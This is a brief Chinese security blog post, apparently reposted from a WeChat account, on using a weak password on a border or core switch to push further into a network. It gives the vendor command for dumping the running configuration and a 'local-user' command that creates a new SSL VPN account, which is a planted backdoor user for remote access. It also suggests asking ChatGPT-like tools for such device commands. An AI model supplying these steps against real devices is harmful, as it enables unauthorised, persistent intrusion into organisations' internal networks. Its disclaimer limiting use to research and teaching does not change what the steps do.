引言
前几天有个兄弟,拿到了某品牌的边界交换的弱口令,同时扫到了Vpn的开放端口,因为可能是对网络设备不熟悉,没法进一步深入。了解些网络原理其实很容易搞通。
给大家的思路,就是通过各类人工智能聊天的工具,结合自己的思路去查相关命令。
应用场景:
边界拿到了路由或者核心交换的弱口令
内网获取了防火墙弱口令,可以进一步测试逻辑业务内网隔离。
可以问一下chatgpt这类的工具,如何查询某品牌当前的运行时配置文件:
比如这里就是:display current-configuration 运行后,可以看到完整的运行配置文件
配置文件里面基本上有完整的新建vpn用户的命令,自己新建Vpn用户就行了:
local-user userTest11 class networkpassword simple xxxxxxxservice-type sslvpnauthorization-attribute user-role network-operatorauthorization-attribute sslvpn-policy-group resourcegrp
原文始发于微信公众号(安全初心):核心交换弱口令利用的小技巧
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论